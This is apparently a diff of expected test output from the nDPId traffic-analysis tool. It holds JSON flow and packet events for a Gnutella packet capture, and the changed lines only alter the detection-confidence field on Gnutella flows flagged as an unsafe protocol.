00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":311750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":311750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SbsAAIARjAIKAAIPdqbiRnAJGMoAILCeR05EED\/RAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -2674,20 +2674,20 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":312957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":312957,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05pQAAIARsCAKAAIPTudJDnAJGMoAIHF1R05EED\/yAQFUC1FLUlAGUk5BXS\/iNQlw"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4960,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":312961,"flow_last_seen":312961,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":312961,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.140.96","src_port":28681,"dst_port":14400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4960,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":312961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":312961,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0s80AAIARSSgKAAIPpVSMYHAJOEAAILg+R05EED\/zAQFUC1FLUlAGUk5BXS\/iNQlw"} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":124065,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":124065,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132833,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":1032,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132833,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":1032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132831,"flow_last_seen":132831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.181.151.217","src_port":28681,"dst_port":25282,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":132831,"flow_last_seen":132831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.181.151.217","src_port":28681,"dst_port":25282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":129174,"flow_last_seen":129344,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":129174,"flow_last_seen":129344,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131669,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -2696,17 +2696,17 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.157.183.106","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 